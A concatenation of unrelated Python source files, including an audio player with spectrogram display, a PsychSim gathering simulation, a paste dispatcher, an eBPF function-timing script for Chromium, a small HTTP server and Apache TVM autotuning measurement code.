SystemState.AudioState.audio_archive = os.listdir(path)
SystemState.AudioState.audio_archive = [os.path.join(path, audio) for audio in SystemState.AudioState.audio_archive]
SystemState.AudioState.audio_archive = sorted(SystemState.AudioState.audio_archive)
# Iterating through files and excluding all non-wav files.
for name in SystemState.AudioState.audio_archive:
if fnmatch.fnmatch(name, '*.wav') != True:
SystemState.AudioState.audio_archive.remove(name)
SystemState.AudioState.audio_count = len(SystemState.AudioState.audio_archive)
if SystemState.AudioState.audio_count > 0:
SystemState.AudioState.audio_index = SystemState.AudioState.audio_count - 1
SystemState.AudioState.current_audio_file = SystemState.AudioState.audio_archive[SystemState.AudioState.audio_index]
filename = os.path.basename(SystemState.AudioState.current_audio_file)
filename = filename.split('.')[0]
timestamp = filename
filename = SystemState.AudioState.metadata_path + filename + '.png'
timestamp = time.ctime(int(timestamp))
ShowSpectrogram(filename)
else:
TextWriter.Write(
state=SystemState,
text='No Recordings',
position=(95, 100),
size=20
)
def Play():
"""Plays the selected soundbite"""
SystemState.AudioState.audio_player_state = 'Paused'
SystemState.AudioState.audio_name = SystemState.AudioState.audio_archive[SystemState.AudioState.audio_index]
SystemState.pygame.mixer.music.load(SystemState.AudioState.audio_archive[SystemState.AudioState.audio_index])
if SystemState.AudioState.audio_player_state == 'Paused' and SystemState.AudioState.audio_time > 2:
SystemState.pygame.mixer.music.play(0, SystemState.AudioState.audio_time)
else:
SystemState.pygame.mixer.music.play(0, 0)
def Pause():
"""Pauses the selected soundbite"""
SystemState.pygame.mixer.music.pause()
SystemState.AudioState.audio_player_state = 'Paused'
SystemState.state_history_direction = 0
SystemState.AudioState.audio_time += SystemState.pygame.mixer.music.get_pos()/1000.0
def BlitImage(filename, pygame, screen):
"""Stamps an image on the screen"""
try:
raw_image = pygame.image.load(filename)
scaled_image = pygame.transform.scale(raw_image, (320, 240))
scaled_x = (320 - scaled_image.get_width()) / 2
scaled_y = (240 - scaled_image.get_height()) / 2
screen.blit(scaled_image, (scaled_x, scaled_y))
except:
screen.fill(0)
TextWriter.Write(
state=SystemState,
text='Spectragram Not Found',
position=(70, 100),
size=16
)
def ShowSpectrogram(filename):
"""Shows a picture of the spectrogram on the screen"""
pygame = SystemState.pygame
screen = SystemState.screen
BlitImage(filename, pygame, screen)
def FastForward():
"""Move forward in the audio file five seconds"""
SystemState.AudioState.audio_time += 5
SystemState.pygame.mixer.music.play(0, SystemState.AudioState.audio_time)
def Rewind():
"""Moves backward in the audio file five seconds"""
SystemState.AudioState.audio_time -= 5
SystemState.pygame.mixer.music.play(0, SystemState.AudioState.audio_time)
def DeleteAudio():
filename = SystemState.AudioState.current_audio_file
filename = filename.split('/')[2].split('.')[0]
metadata_file = SystemState.AudioState.metadata_path + filename + '.png'
"""Deletes a selected soundbite and its spectrogram"""
try:
os.remove(SystemState.current_audio_file)
except: # TODO:print that preview couldn't be removed.
print "Couldn't remove preview image"
try:
SystemState.AudioState.audio_archive.remove(SystemState.AudioState.current_audio_file)
except: # TODO: print that file was not removed from library.
print "Couldn't remove from library"
try:
os.remove(metadata_file)
except: # TODO:print that preview couldn't be removed.
print "Couldn't remove preview image"
def NextRecording():
"""Changes to the next recording (Forward in the list)"""
if SystemState.AudioState.audio_index < SystemState.AudioState.audio_count - 1:
SystemState.AudioState.audio_index += 1
else:
SystemState.AudioState.audio_index = 0
name = SystemState.AudioState.audio_archive[SystemState.AudioState.audio_index]
filename = name.split('/')[2].split('.')[0]
filename = SystemState.AudioState.metadata_path + filename + '.png'
SystemState.AudioState.audio_name = SystemState.AudioState.audio_archive[SystemState.AudioState.audio_index]
Play()
ShowSpectrogram(filename)
def PreviousRecording():
"""Changes to the previous recording (Backwards in the list)"""
if SystemState.AudioState.audio_index > 0:
SystemState.AudioState.audio_index -= 1
else:
SystemState.AudioState.audio_index = SystemState.AudioState.audio_count - 1
name = SystemState.AudioState.audio_archive[SystemState.AudioState.audio_index]
filename = name.split('/')[2].split('.')[0]
filename = SystemState.AudioState.metadata_path + filename + '.png'
SystemState.AudioState.audio_name = SystemState.AudioState.audio_archive[SystemState.AudioState.audio_index]
Play()
ShowSpectrogram(filename)
def _GenerateSpectrogram(wavefile, timestamp):
"""Generates a spectrogram that works with the recorded sound"""
metadata_path = SystemState.AudioState.metadata_path
filename = metadata_path + timestamp + '.png'
signal = wavefile.readframes(-1)
signal = numpy.fromstring(signal, 'Int16')
framerate = wavefile.getframerate()
plt.title(time.ctime(float(timestamp)), fontsize=24)
plt.subplot(111)
plt.specgram(signal, Fs=framerate, NFFT=128, noverlap=0)
plt.savefig(filename, dpi=100, figsize=(8,6), format='png')
plt.close()
|
gathering.py | from psychsim.reward import *
from psychsim.pwl import *
from psychsim.action import *
from psychsim.world import *
from psychsim.agent import *
import psychsim.probability
import pyglet
from pyglet.window import key
from threading import Thread
GATHERERS = 2
TURNS = 10000
class Gathering:
def __init__(self):
self.paused = False
self.world = World()
self.world.defineState(None, 'turns', int)
self.world.setState(None, 'turns', 0)
self.world.addTermination(makeTree({'if': thresholdRow(stateKey(None, 'turns'), TURNS),
True: True, False: False}))
self.agts = []
self.tiles = []
self.create_agents()
for i in range(1,4):
for j in range(1,4):
self.generate_food(i,j)
# Parallel action
#self.world.setOrder([set(self.world.agents.keys())])
#self.world.setOrder([set([tile.name for tile in self.tiles]),set([agent.name for agent in self.agts])])
# Sequential action
self.world.setOrder(self.world.agents.keys())
def create_agents(self):
# Create multiple agents
for i in range(0,GATHERERS):
actor = Agent('Actor'+str(i))
self.world.addAgent(actor)
actor.setHorizon(10)
# States
self.world.defineState(actor.name,'food',int)
self.world.setState(actor.name,'food',0)
self.world.defineState(actor.name,'x',int)
self.world.defineState(actor.name,'y',int)
# Start at different locations
if i==0:
self.world.setState(actor.name,'x',0)
self.world.setState(actor.name,'y',0)
else:
self.world.setState(actor.name,'x',4)
self.world.setState(actor.name,'y',4)
# Nop
'''
action = actor.addAction({'verb': 'Wait'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 0.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
'''
# Increment X position
action = actor.addAction({'verb': 'MoveRight'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics('turns', action, tree)
# Rightmost boundary check
tree = makeTree({'if': equalRow(stateKey(actor.name, 'x'), '4'),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Decrement X position
action = actor.addAction({'verb': 'MoveLeft'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'x'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'x'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Leftmost boundary check, min X = 0
tree = makeTree({'if': equalRow(stateKey(actor.name, 'x'), '0'),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Increment Y position
action = actor.addAction({'verb': 'MoveUp'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), 1.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Downmost boundary check, max Y
tree = makeTree({'if': equalRow(stateKey(actor.name, 'y'), '4'),
True: False, False: True})
actor.setLegal(action, tree)
##############################
# Decrement Y position
action = actor.addAction({'verb': 'MoveDown'})
tree = makeTree(incrementMatrix(stateKey(action['subject'], 'y'), -1.))
self.world.setDynamics(stateKey(action['subject'], 'y'), action, tree)
tree = makeTree(incrementMatrix('turns', 1.0))
self.world.setDynamics(stateKey(None, 'turns'), action, tree)
# Upmost boundary check, min Y = 0
tree = makeTree({'if': equalRow(stateKey(actor.name, 'y'), '0'),
True: False, False: True})
actor.setLegal(action, tree)
# Maximize your current food count
#actor.setReward(maximizeFeature(stateKey(actor.name,'food')),1.0)
# Models of belief
actor.addModel('Selfish',R={},level=2,rationality=10.,selection='distribution')
actor.addModel('Altruistic',R={},level=2,rationality=10.,selection='distribution')
#actor.addModel('Sadistic',R={},level=2,rationality=10.,selection='distribution')
self.agts.append(actor)
def generate_food(self, i ,j):
location = Agent(str(i) + ',' + str(j))
self.tiles.append(location)
self.world.addAgent(location)
location.setHorizon(1)
self.world.defineState(location.name, 'food', bool)
self.world.setState(location.name, 'food', True)
self.world.defineState(location.name, 'x', int)
self.world.setState(location.name, 'x', i)
self.world.defineState(location.name, 'y', int)
self.world.setState(location.name, 'y', j)
nothing = location.addAction({
'verb': 'nothing'
})
# Probability of spawning a food on the current tile
action = location.addAction({
'verb': 'generate'
})
tree = makeTree({
'distribution': [(setTrueMatrix(stateKey(location.name, 'food')), 0.05), (setFalseMatrix(stateKey(location.name, 'food')), 0.95)]
})
self.world.setDynamics(stateKey(location.name, 'food'), action, tree)
# Can't respawn food if food is already food there
tree = makeTree({
'if': trueRow(stateKey(location.name, 'food')),
True: False,
False: True
})
location.setLegal(action, tree)
# Force food tile to run generate when there's no food
tree = makeTree({
'if': trueRow(stateKey(location.name, 'food')),
True: True,
False: False
})
location.setLegal(nothing, tree)
# If an agent is on a food tile, give the agent the food
for i in range(0,GATHERERS):
action = location.addAction({
'verb': 'food'+str(i)
})
tree = makeTree(setFalseMatrix(stateKey(location.name, 'food')))
self.world.setDynamics(stateKey(location.name, 'food'), action, tree)
tree = makeTree(incrementMatrix(stateKey(self.agts[i].name, 'food'),1))
self.world.setDynamics(stateKey(self.agts[i].name, 'food'), action, tree)
tree = makeTree({
'if': trueRow(stateKey(location.name, 'food')),
True: {'if': equalFeatureRow(stateKey(location.name, 'x'), stateKey(self.agts[i].name,'x')),
True: {'if': equalFeatureRow(stateKey(location.name, 'y'), stateKey(self.agts[i].name,'y')),
True: True,
False: False
},
False: False
},
False: False
})
location.setLegal(action, tree)
# hack: prioritize giving food over no action
location.setReward(achieveFeatureValue(stateKey(location.name,'food'),False),1.)
def modeltest(self,trueModels,A,B,strongerBelief):
agts = self.agts
for i in range(2):
me = agts[i]
other = agts[1-i]
for model in me.models.keys():
print me.models.keys()
if model is True:
name = trueModels[me.name]
else:
name = model
if name == 'Selfish':
me.setReward(maximizeFeature(stateKey(me.name,'food')),1.0,model)
elif name == 'Altruistic':
me.setReward(maximizeFeature(stateKey(me.name,'food')),1.0,model)
me.setReward(maximizeFeature(stateKey(other.name,'food')),1.0,model)
#elif name == 'Sadistic':
# me.setReward(minimizeFeature(stateKey(other.name,'money')),1.0,model)
# me.setReward(maximizeFeature(stateKey(other.name,'money')),1.0,model)
weakBelief = 1.0 - strongerBelief
belief = {'Selfish': weakBelief,'Altruistic': weakBelief}
belief[A] = strongerBelief
self.world.setMentalModel('Actor0','Actor1',belief)
belief = {'Selfish': weakBelief,'Altruistic': weakBelief}
belief[B] = strongerBelief
self.world.setMentalModel('Actor1','Actor0',belief)
def run_without_visual(self):
while not self.world.terminated():
result = self.world.step()
self.world.explain(result, 2)
self.evaluate_score()
# Graphics
def run_with_visual(self):
pyglet.resource.path = ['../resources/gathering']
pyglet.resource.reindex()
SCREEN_WIDTH = 5 * 32
SCREEN_HEIGHT = 5 * 32
window = pyglet.window.Window(resizable=True)
window.set_size(SCREEN_WIDTH, SCREEN_HEIGHT)
tile_image = pyglet.resource.image("black.jpg")
tiles_batch = pyglet.graphics.Batch()
tiles = []
for y in range(0, 5):
for x in range(0, 5):
tiles.append(pyglet.sprite.Sprite(
img=tile_image,
x=x * 32,
y=y * 32,
batch=tiles_batch)
)
goal_image = pyglet.resource.image("green.jpg")
goals_batch = pyglet.graphics.Batch()
goals = []
for i in range(0, 5):
goals_sub = []
for j in range(0, 5):
goals_sub.append(pyglet.sprite.Sprite(
img=goal_image,
x= i * 32 + 1999,
y= j * 32 + 1999,
batch=goals_batch)
)
goals.append(goals_sub)
#agent_image = pyglet.resource.image("white.jpg")
agent0_image = pyglet.resource.image("0.jpg")
agent1_image = pyglet.resource.image("1.jpg")
agents_batch = pyglet.graphics.Batch()
agents = []
for index in range(0, GATHERERS):
if index == 0:
agents.append(pyglet.sprite.Sprite(
img=agent0_image,
x=index * 32,
y=index * 32,
batch=agents_batch))
else:
agents.append(pyglet.sprite.Sprite(
img=agent1_image,
x=index * 32,
y=index * 32,
batch=agents_batch))
@window.event
def on_draw():
window.clear()
tiles_batch.draw()
goals_batch.draw()
agents_batch.draw()
@window.event
def on_key_press(symbol, modifiers):
if symbol == key.P:
self.paused = True
print('Paused')
if symbol == key.U:
self.paused = False
print('Resumed')
def update(dt):
if not self.paused:
result = self.world.step()
self.world.explain(result, 2)
for i in range(1,4):
for j in range(1,4):
val = self.world.getState(str(i)+','+str(j),'food').domain()[0]
#print str(i)+','+str(j)+':'+str(val)
if self.world.terminated():
window.close()
for i in range(0,GATHERERS):
agents[i].x = int(self.world.getState('Actor' + str(i), 'x').domain()[0]) * 32
agents[i].y = int(self.world.getState('Actor' + str(i), 'y').domain()[0]) * 32
for i in range(1,4):
for j in range(1,4):
val = self.world.getState(str(i)+','+str(j),'food').domain()[0]
if val:
goals[i][j].x = i * 32
goals[i][j].y = j * 32
else:
goals[i][j].x = i * 1999
goals[i][j].y = j * 1999
pyglet.clock.schedule_interval(update, 0.1)
# pyglet.app.run()
Thread(target=pyglet.app.run()).start()
# target=pyglet.app.run()
if __name__ == '__main__':
run = Gathering()
trueModels = {'Actor0': 'Selfish',
'Actor1': 'Selfish'}
run.modeltest(trueModels,'Selfish','Selfish',1.0)
run.run_with_visual()
|
pastedispatcher.py | # -*- coding: utf-8 -*-
import logging
from queue import Empty, Queue
from threading import Event, Lock
from time import sleep
from pastepwn.util import start_thread, join_threads
class PasteDispatcher(object):
"""The PasteDispatcher dispatches the downloaded pastes to the analyzers"""
def __init__(self, paste_queue, action_queue=None, exception_event=None):
self.logger = logging.getLogger(__name__)
self.paste_queue = paste_queue
self.action_queue = action_queue or Queue()
self.analyzers = []
self.running = False
self.__lock = Lock()
self.__threads = []
self.__thread_pool = set()
self.__exception_event = exception_event or Event()
self.__stop_event = Event()
def _pool_thread(self):
while True:
pass
def add_analyzer(self, analyzer):
"""Adds an analyzer to the list of analyzers"""
with self.__lock:
self.analyzers.append(analyzer)
def start(self, workers=4, ready=None):
"""Starts dispatching the downloaded pastes to the list of analyzers"""
with self.__lock:
if not self.running:
if len(self.analyzers) == 0:
self.logger.warning("No analyzers added! At least one analyzer must be added prior to use!")
return None
self.running = True
thread = start_thread(self._start_analyzing, "PasteDispatcher", exception_event=self.__exception_event)
self.__threads.append(thread)
# Start thread pool with worker threads
# for i in range(workers):
# thread = Thread(target=self._pool_thread, name="analyzer_{0}".format(i))
# self.__thread_pool.add(thread)
# thread.start()
if ready is not None:
ready.set()
return self.action_queue
def _start_analyzing(self):
while self.running:
try:
# Get paste from queue
paste = self.paste_queue.get(True, 1)
# TODO implement thread pool to limit number of parallel executed threads
# Don't add these threads to the list. Otherwise they will just block the list
start_thread(self._process_paste, "process_paste", paste=paste, exception_event=self.__exception_event)
except Empty:
if self.__stop_event.is_set():
self.logger.debug("orderly stopping")
self.running = False
break
elif self.__exception_event.is_set():
self.logger.critical("stopping due to exception in another thread")
self.running = False
break
continue
def _process_paste(self, paste):
self.logger.debug("Analyzing Paste: {0}".format(paste.key))
for analyzer in self.analyzers:
if analyzer.match(paste):
actions = analyzer.actions
self.action_queue.put((actions, paste, analyzer))
def stop(self):
"""Stops dispatching pastes to the analyzers"""
self.__stop_event.set()
while self.running:
sleep(0.1)
self.__stop_event.clear()
join_threads(self.__threads)
self.__threads = []
|
onefunctime.py | #!/usr/bin/python
from bcc import BPF
import Tkinter as tk
import threading
from multiprocessing import Process
import signal, os
from time import sleep
def runbpf(self, name, sym):
# print("nanananana %s"%name)
# print("lalalalala %s"%sym)
bpf_source = """
BPF_HASH(cache, u64, u64);
BPF_ARRAY(avg, u64, 2);
int trace_start_time(struct pt_regs *ctx) {
//u64 pid = bpf_get_current_pid_tgid();
u64 funid = 1;
u64 start_time_ns = bpf_ktime_get_ns();
cache.update(&funid, &start_time_ns);
return 0;
}
"""
bpf_source += """
int print_duration(struct pt_regs *ctx) {
//u64 pid = bpf_get_current_pid_tgid();
u64 funid = 1;
u64 *start_time_ns = cache.lookup(&funid);
if (start_time_ns == 0) {
return 0;
}
u64 duration_ns = bpf_ktime_get_ns() - *start_time_ns;
cache.delete(&funid);
u32 lat = 0;
u32 cnt = 1;
u64 *sum = avg.lookup(&lat);
if (sum) lock_xadd(sum, duration_ns);
u64 *cnts = avg.lookup(&cnt);
if (cnts) lock_xadd(cnts, 1);
bpf_trace_printk("Function: blink::V8ScriptRunner::CompileAndRunScript call duration: %d us\\n", duration_ns/1000);
return 0;
}
"""
print("--")
#bpf_source += bpf_source1
bpf = BPF(text = bpf_source)
bpf.attach_uprobe(name = "/home/bytedance/graduation_project/chromium/src/out/Default/out/Debug/libblink_core.so", sym = "_ZN5blink14V8ScriptRunner17RunCompiledScriptEPN2v87IsolateENS1_5LocalINS1_6ScriptEEEPNS_16ExecutionContextE", fn_name = "trace_start_time")
bpf.attach_uretprobe(name = "/home/bytedance/graduation_project/chromium/src/out/Default/out/Debug/libblink_core.so", sym = "_ZN5blink14V8ScriptRunner17RunCompiledScriptEPN2v87IsolateENS1_5LocalINS1_6ScriptEEEPNS_16ExecutionContextE", fn_name = "print_duration")
#bpf.attach_uprobe(name = name , sym = sym, fn_name = "trace_start_time")
#bpf.attach_uretprobe(name = name, sym = sym, fn_name = "print_duration")
#bpf.trace_print()
'''
while(1):
sleep(1);
total = bpf['avg'][0].value
counts = bpf['avg'][1].value
if counts > 0:
avg = total/counts
print("\n------------------------avg = %ld us, total: %ld us, count: %ld\n" %(total/counts, total, counts))
'''
#/home/bytedance/graduation_project/chromium/src/out/Default/out/Debug/libblink_core.so
#_ZN5blink14V8ScriptRunner17RunCompiledScriptEPN2v87IsolateENS1_5LocalINS1_6ScriptEEEPNS_16ExecutionContextE
#def worker(arg):
# runbpf()
global process1
def runbpfprocess(self,name,sym):
#process1=Process(target=runbpf,kwargs={'name':name,'sym':sym})
#process1.start()
t1 = threading.Thread(target=runbpf,kwargs={'self':self,'name':name,'sym':sym})
t1.start()
def printexit():
print ("process exit")
def sendexit():
signal.signal(signal.SIGINT, printexit)
os.kill(os.getpid(), signal)
'''
window = tk.Tk()
window.title('My Window')
window.geometry('500x300')
e = tk.Entry(window, show = None)
e.pack()
f = tk.Entry(window, show = None)
f.pack()
def insert_point():
var = e.get()
print (var)
t.insert('insert', var)
def insert_end():
var = f.get()
t.insert('end', var)
b1 = tk.Button(window, text='insert point', width=10,
height=2, command=runbpfprocess)
b1.pack()
b2 = tk.Button(window, text='insert end', width=10,
height=2, command=sendexit)
b2.pack()
t = tk.Text(window, height=3)
t.pack()
window.mainloop()
''' |
httpserver.py | #
# SPDX-License-Identifier: MIT
#
import http.server
import multiprocessing
import os
import traceback
import signal
from socketserver import ThreadingMixIn
class HTTPServer(ThreadingMixIn, http.server.HTTPServer):
def server_start(self, root_dir, logger):
os.chdir(root_dir)
self.serve_forever()
class HTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
def log_message(self, format_str, *args):
pass
class HTTPService(object):
def __init__(self, root_dir, host='', logger=None):
self.root_dir = root_dir
self.host = host
self.port = 0
self.logger = logger
def start(self):
if not os.path.exists(self.root_dir):
self.logger.info("Not starting HTTPService for directory %s which doesn't exist" % (self.root_dir))
return
self.server = HTTPServer((self.host, self.port), HTTPRequestHandler)
if self.port == 0:
self.port = self.server.server_port
self.process = multiprocessing.Process(target=self.server.server_start, args=[self.root_dir, self.logger])
# The signal handler from testimage.bbclass can cause deadlocks here
# if the HTTPServer is terminated before it can restore the standard
#signal behaviour
orig = signal.getsignal(signal.SIGTERM)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
self.process.start()
signal.signal(signal.SIGTERM, orig)
if self.logger:
self.logger.info("Started HTTPService on %s:%s" % (self.host, self.port))
def stop(self):
if hasattr(self, "server"):
self.server.server_close()
if hasattr(self, "process"):
self.process.terminate()
self.process.join()
if self.logger:
self.logger.info("Stopped HTTPService on %s:%s" % (self.host, self.port))
|
ThreadStoppable.py | import threading
import queue
class ThreadStoppable(object):
def __init__(self, target_to_loop, timeout=-1, args=()):
self._target_to_loop = target_to_loop
self._args = args
self._timeout = timeout
self.queue = queue.Queue()
self.start()
def loop(self):
while not self._stop_loop:
r = self._target_to_loop(*self._args)
self.queue.put(r)
def stop(self):
self._stop_loop = True
def start(self):
self._stop_loop = False
self.thread = threading.Thread(target=self.loop)
self.thread.start()
assert self._timeout > 0 or self._timeout == -1, \
'Invalid timeout value given.'
if self._timeout > 0:
t = threading.Timer(self._timeout, self.stop)
t.start()
|
measure_methods.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name,too-many-function-args,too-many-nested-blocks
"""
Functions that run on executor for measurement.
These functions are responsible for building the tvm module, uploading it to
remote devices, recording the running time costs, and checking the correctness of the output.
"""
import logging
import shutil
import os
import threading
import time
from random import getrandbits
from collections import namedtuple
import tempfile
import numpy as np
import tvm._ffi
from tvm import nd, rpc as _rpc, target as _target
from tvm.error import TVMError
from tvm.target import build_config
from tvm.driver import build
from tvm.contrib import nvcc, ndk, tar
from ..util import get_const_tuple
from ..env import AutotvmGlobalScope
from ..task.space import InstantiationError
from .measure import MeasureResult, MeasureErrorNo, Builder, Runner
from .local_executor import LocalExecutor
logger = logging.getLogger('autotvm')
class BuildResult(namedtuple("BuildResult", ('filename', 'arg_info', 'error', 'time_cost'))):
"""
Stores all the necessary inputs for a measurement.
Parameters
----------
filename : str
The filename of generated library
arg_info : Tuple
The shape and dtype information of tvm tensor arguments
error : Exception
The error happens during compilation.
time_cost : float
The time cost of building
"""
class LocalBuilder(Builder):
"""Run compilation on local machine
Parameters
----------
timeout: float
The timeout of a compilation
n_parallel: int
The number of tasks run in parallel. "None" will use all cpu cores
build_func: callable or str
If is 'default', use default build function
If is 'ndk', use function for android ndk
If is callable, use it as custom build function, expect lib_format field.
"""
def __init__(self, timeout=10, n_parallel=None, build_func='default'):
super(LocalBuilder, self).__init__(timeout, n_parallel)
if isinstance(build_func, str):
if build_func == 'default':
build_func = tar.tar
elif build_func == 'ndk':
build_func = ndk.create_shared
else:
raise ValueError("Invalid build_func" + build_func)
self.build_func = _wrap_build_func(build_func)
self.executor = LocalExecutor(timeout=timeout)
self.tmp_dir = tempfile.mkdtemp()
def build(self, measure_inputs):
results = []
shutil.rmtree(self.tmp_dir, ignore_errors=True)
self.tmp_dir = tempfile.mkdtemp()
for i in range(0, len(measure_inputs), self.n_parallel):
futures = []
for inp in measure_inputs[i:i + self.n_parallel]:
ret = self.executor.submit(self.build_func,
inp,
self.tmp_dir,
**self.build_kwargs)
futures.append(ret)
for future in futures:
res = future.get()
if isinstance(res, Exception):
# timeout or fleet error, return MeasureResult directly
results.append(MeasureResult((res,), MeasureErrorNo.BUILD_TIMEOUT,
self.timeout, time.time()))
elif res.error is not None:
# instantiation error
if isinstance(res.error, InstantiationError):
results.append(MeasureResult((res.error,),
MeasureErrorNo.INSTANTIATION_ERROR,
res.time_cost, time.time()))
else:
if "InstantiationError" in str(res.error):
msg = str(res.error)
try:
msg = msg.split('\n')[-2].split(": ")[1]
except Exception: # pylint: disable=broad-except
pass
results.append(MeasureResult((InstantiationError(msg),),
MeasureErrorNo.INSTANTIATION_ERROR,
res.time_cost, time.time()))
else: # tvm error
results.append(MeasureResult((res.error,),
MeasureErrorNo.COMPILE_HOST,
res.time_cost, time.time()))
else:
# return BuildResult
results.append(res)
return results
class RPCRunner(Runner):
"""Run generated code on remove devices.
This function will ask a RPC Tracker to get device for measurement.
Parameters
----------
timeout: float
The timeout of a compilation
n_parallel: int
The number of tasks run in parallel. "None" will use all cpu cores
key: str
The key of the device registered in the tracker
host: str
The host address of RPC Tracker
port: int
The port of RPC Tracker
number: int
The number of times to run the generated code for taking average.
We call these runs as one `repeat` of measurement.
repeat : int, optional
The number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first "1" is warm up and will be discarded.
The returned result contains `repeat` costs,
each of which is an average of `number` costs.
min_repeat_ms: int, optional
The minimum duration of one `repeat` in milliseconds.
By default, one `repeat` contains `number` runs. If this parameter is set,
the parameters `number` will be dynamically adjusted to meet the
minimum duration requirement of one `repeat`.
i.e., When the run time of one `repeat` falls below this time, the `number` parameter
will be automatically increased.
cooldown_interval: float, optional
The cool down interval between two measurements.
check_correctness: bool, optional
Whether check correctness after measurement. This will use llvm cpu target to
call your template and get the reference output.
This can work for TOPI templates, but may not work for your custom template.
"""
def __init__(self,
key, host, port, priority=1,
timeout=10, n_parallel=None,
number=4, repeat=3, min_repeat_ms=0, cooldown_interval=0.1,
check_correctness=False):
super(RPCRunner, self).__init__(timeout, n_parallel)
self.key = key
self.host = host
self.port = port
self.priority = priority
self.timeout = timeout
self.number = number
self.repeat = repeat
self.min_repeat_ms = min_repeat_ms
self.ref_input = None
self.ref_output = None
self.check_correctness = check_correctness
self.cooldown_interval = cooldown_interval
self.executor = LocalExecutor()
def set_task(self, task):
self.task = task
if check_remote(task.target, self.key, self.host, self.port):
logger.info("Get devices for measurement successfully!")
else:
raise RuntimeError("Cannot get remote devices from the tracker. "
"Please check the status of tracker by "
"'python -m tvm.exec.query_rpc_tracker --port [THE PORT YOU USE]' "
"and make sure you have free devices on the queue status.")
if self.check_correctness:
# use llvm cpu to generate a reference input/output
# this option works for tuning topi, but might not work for you custom op
with _target.create("llvm"):
s, arg_bufs = task.instantiate(task.config_space.get(0))
self.ref_input = [np.random.uniform(size=get_const_tuple(x.shape)).astype(x.dtype)
for x in arg_bufs]
func = build(s, arg_bufs, "llvm")
tvm_buf = [nd.array(x) for x in self.ref_input]
func(*tvm_buf)
self.ref_output = [x.asnumpy() for x in tvm_buf]
def get_build_kwargs(self):
kwargs = {}
if 'cuda' in self.task.target.keys or 'opencl' in self.task.target.keys or \
'rocm' in self.task.target.keys:
remote = request_remote(self.key, self.host, self.port)
ctx = remote.context(str(self.task.target), 0)
max_dims = ctx.max_thread_dimensions
kwargs['check_gpu'] = {
'max_shared_memory_per_block': ctx.max_shared_memory_per_block,
'max_threads_per_block': ctx.max_threads_per_block,
'max_thread_x': max_dims[0],
'max_thread_y': max_dims[1],
'max_thread_z': max_dims[2],
}
if 'cuda' in self.task.target.keys:
kwargs["cuda_arch"] = "sm_" + "".join(ctx.compute_version.split('.'))
return kwargs
def run(self, measure_inputs, build_results):
results = []
remote_args = (self.key, self.host, self.port, self.priority, self.timeout)
for i in range(0, len(measure_inputs), self.n_parallel):
futures = []
for measure_inp, build_res in zip(measure_inputs[i:i+self.n_parallel],
build_results[i:i+self.n_parallel]):
ret = self.executor.submit(run_through_rpc,
measure_inp,
build_res,
self.number,
self.repeat,
self.min_repeat_ms,
self.cooldown_interval,
remote_args,
self.ref_input,
self.ref_output)
futures.append(ret)
for future in futures:
res = future.get()
if isinstance(res, Exception): # executor error or timeout
results.append(MeasureResult((str(res),), MeasureErrorNo.RUN_TIMEOUT,
self.timeout, time.time()))
else:
results.append(res)
return results
class LocalRunner(RPCRunner):
"""Run generated code on local devices.
Parameters
----------
timeout: float
The timeout of a compilation
number: int
The number of times to run the generated code for taking average.
We call these runs as one `repeat` of measurement.
repeat : int, optional
The number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first one is warm up and will be discarded.
The returned result contains `repeat` costs,
each of which is an average of `number` costs.
min_repeat_ms: int, optional
The minimum duration of one `repeat` in milliseconds.
By default, one `repeat` contains `number` runs. If this parameter is set,
the parameters `number` will be dynamically adjusted to meet the
minimum duration requirement of one `repeat`.
i.e., When the run time of one `repeat` falls below this time, the `number` parameter
will be automatically increased.
cooldown_interval: float, optional
The cool down interval between two measurements.
check_correctness: bool, optional
Whether check correctness after measurement. This will use llvm cpu target to
call your template and get the reference output.
This can work for TOPI templates, but may not work for your custom template.
Note
----
This is a "fake" local mode. We start a silent rpc tracker and rpc server
for the user. In this way we reuse timeout/isolation mechanism in RPC infrastructure.
"""
def __init__(self,
timeout=10,
number=4, repeat=3, min_repeat_ms=0, cooldown_interval=0.1,
check_correctness=False):
super(LocalRunner, self).__init__('', None, None, 0,
timeout=timeout, n_parallel=1,
number=number, repeat=repeat,
min_repeat_ms=min_repeat_ms,
cooldown_interval=cooldown_interval,
check_correctness=check_correctness)
self.tracker = None
self.server = None
def set_task(self, task):
# pylint: disable=import-outside-toplevel
from ...rpc.tracker import Tracker
from ...rpc.server import Server
self.task = task
tracker = Tracker('0.0.0.0', port=9000, port_end=10000, silent=True)
device_key = '$local$device$%d' % tracker.port
server = Server('0.0.0.0', port=9000, port_end=10000,
key=device_key,
use_popen=True, silent=True,
tracker_addr=(tracker.host, tracker.port))
self.key = device_key
self.host = tracker.host
self.port = tracker.port
super(LocalRunner, self).set_task(task)
return server, tracker
